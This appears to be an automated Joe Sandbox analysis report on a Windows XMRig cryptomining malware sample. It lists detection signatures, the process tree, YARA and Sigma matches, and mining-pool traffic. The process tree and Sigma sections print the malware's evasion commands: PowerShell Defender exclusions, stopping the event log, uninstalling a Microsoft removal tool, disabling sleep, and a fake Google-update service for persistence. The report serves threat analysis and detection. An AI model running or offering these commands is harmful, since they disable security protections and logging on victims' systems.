Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
Analysis ID:1473042
MD5:1547e40089b1b06c2e27658c4f478466
SHA1:b531e9eaeb0f3e606635623d0775b94e2da113a9
SHA256:62133bf304c2143af08217ea5caa1102009e3f70682896ae2997b232f212ec51
Tags:exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Drops executables to the windows directory (C:\Windows) and starts them
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe (PID: 612 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe" MD5: 1547E40089B1B06C2E27658C4F478466)
    • system64x.exe (PID: 6188 cmdline: "C:\Windows\SysWOW64\system64x.exe" MD5: 4471F946569BFA17D68108068D7A17A1)
      • powershell.exe (PID: 5468 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6464 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 7200 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • powercfg.exe (PID: 6532 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3172 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 2884 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 2468 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 3876 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • sc.exe (PID: 2292 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7240 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7288 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7296 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • updater.exe (PID: 7368 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: 4471F946569BFA17D68108068D7A17A1)
    • powershell.exe (PID: 7380 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7772 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 7552 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7568 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7584 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7612 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7672 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 444 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • WMIADAP.exe (PID: 7920 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
      • svchost.exe (PID: 1148 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1188 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1232 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1324 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1384 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 7728 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 7780 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000002F.00000002.3603906840.0000025545E42000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        0000002F.00000002.3608696506.00000255463E2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000002F.00000003.2470568560.0000025545E4D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              0000002F.00000002.3605197071.0000025545E50000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                Click to see the 7 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                47.2.dialer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  47.2.dialer.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                  • 0x37ef98:$a1: mining.set_target
                  • 0x371220:$a2: XMRIG_HOSTNAME
                  • 0x373b48:$a3: Usage: xmrig [OPTIONS]
                  • 0x3711f8:$a4: XMRIG_VERSION
                  47.2.dialer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                  • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                  47.2.dialer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
                  • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
                  • 0x3cd180:$s3: \\.\WinRing0_
                  • 0x376148:$s4: pool_wallet
                  • 0x3705f0:$s5: cryptonight
                  • 0x370600:$s5: cryptonight
                  • 0x370610:$s5: cryptonight
                  • 0x370620:$s5: cryptonight
                  • 0x370638:$s5: cryptonight
                  • 0x370648:$s5: cryptonight
                  • 0x370658:$s5: cryptonight
                  • 0x370670:$s5: cryptonight
                  • 0x370680:$s5: cryptonight
                  • 0x370698:$s5: cryptonight
                  • 0x3706b0:$s5: cryptonight
                  • 0x3706c0:$s5: cryptonight
                  • 0x3706d0:$s5: cryptonight
                  • 0x3706e0:$s5: cryptonight
                  • 0x3706f8:$s5: cryptonight
                  • 0x370710:$s5: cryptonight
                  • 0x370720:$s5: cryptonight
                  • 0x370730:$s5: cryptonight

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_612.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                    amsi64_612.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                      Sigma Signatures

                      Change of critical system settings

                      barindex
                      Sigma detected: Disable power options
                      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Windows\SysWOW64\system64x.exe" , ParentImage: C:\Windows\SysWOW64\system64x.exe, ParentProcessId: 6188, ParentProcessName: system64x.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6532, ProcessName: powercfg.exe

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\system64x.exe" , ParentImage: C:\Windows\SysWOW64\system64x.exe, ParentProcessId: 6188, ParentProcessName: system64x.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5468, ProcessName: powershell.exe
                      Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, ProcessId: 612, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5hfiz3n.jvw.ps1
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\system64x.exe" , ParentImage: C:\Windows\SysWOW64\system64x.exe, ParentProcessId: 6188, ParentProcessName: system64x.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5468, ProcessName: powershell.exe
                      Sigma detected: Uncommon Svchost Parent Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 3876, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe
                      Sigma detected: New Service Creation Using Sc.EXE
                      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Windows\SysWOW64\system64x.exe" , ParentImage: C:\Windows\SysWOW64\system64x.exe, ParentProcessId: 6188, ParentProcessName: system64x.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 7240, ProcessName: sc.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\system64x.exe" , ParentImage: C:\Windows\SysWOW64\system64x.exe, ParentProcessId: 6188, ParentProcessName: system64x.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5468, ProcessName: powershell.exe

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Sigma detected: Stop EventLog
                      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Windows\SysWOW64\system64x.exe" , ParentImage: C:\Windows\SysWOW64\system64x.exe, ParentProcessId: 6188, ParentProcessName: system64x.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7288, ProcessName: sc.exe

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Windows\SysWOW64\system64x.exeAvira: detection malicious, Label: TR/Kryptik.byulc
                      Source: C:\ProgramData\Google\Chrome\updater.exeAvira: detection malicious, Label: TR/Kryptik.byulc
                      Multi AV Scanner detection for dropped file
                      Source: C:\ProgramData\Google\Chrome\updater.exeReversingLabs: Detection: 91%
                      Source: C:\Windows\SysWOW64\system64x.exeReversingLabs: Detection: 91%
                      Multi AV Scanner detection for submitted file
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeReversingLabs: Detection: 47%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeJoe Sandbox ML: detected

                      Bitcoin Miner

                      barindex
                      Yara detected Xmrig cryptocurrency miner
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002F.00000002.3603906840.0000025545E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.3608696506.00000255463E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.2470568560.0000025545E4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.3605197071.0000025545E50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.3053963293.0000025545E50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: dialer.exe PID: 7780, type: MEMORYSTR
                      Detected Stratum mining protocol
                      Source: global trafficTCP traffic: 192.168.2.5:49734 -> 149.102.143.109:10128 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4axnhsyv9a9emwehmn6igq1erjgjfgyebcsx3azg7afhqu9cmgfqf77crfpnfhpun6hcvkws4ntoyrxkfsbkfh8p7e5xslu","pass":"","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
                      Found strings related to Crypto-Mining
                      Source: dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                      Source: dialer.exeString found in binary or memory: cryptonight-monerov7
                      Source: dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                      Source: dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                      Source: dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                      Source: dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49727 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49729 version: TLS 1.2
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000036.00000000.2489829053.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
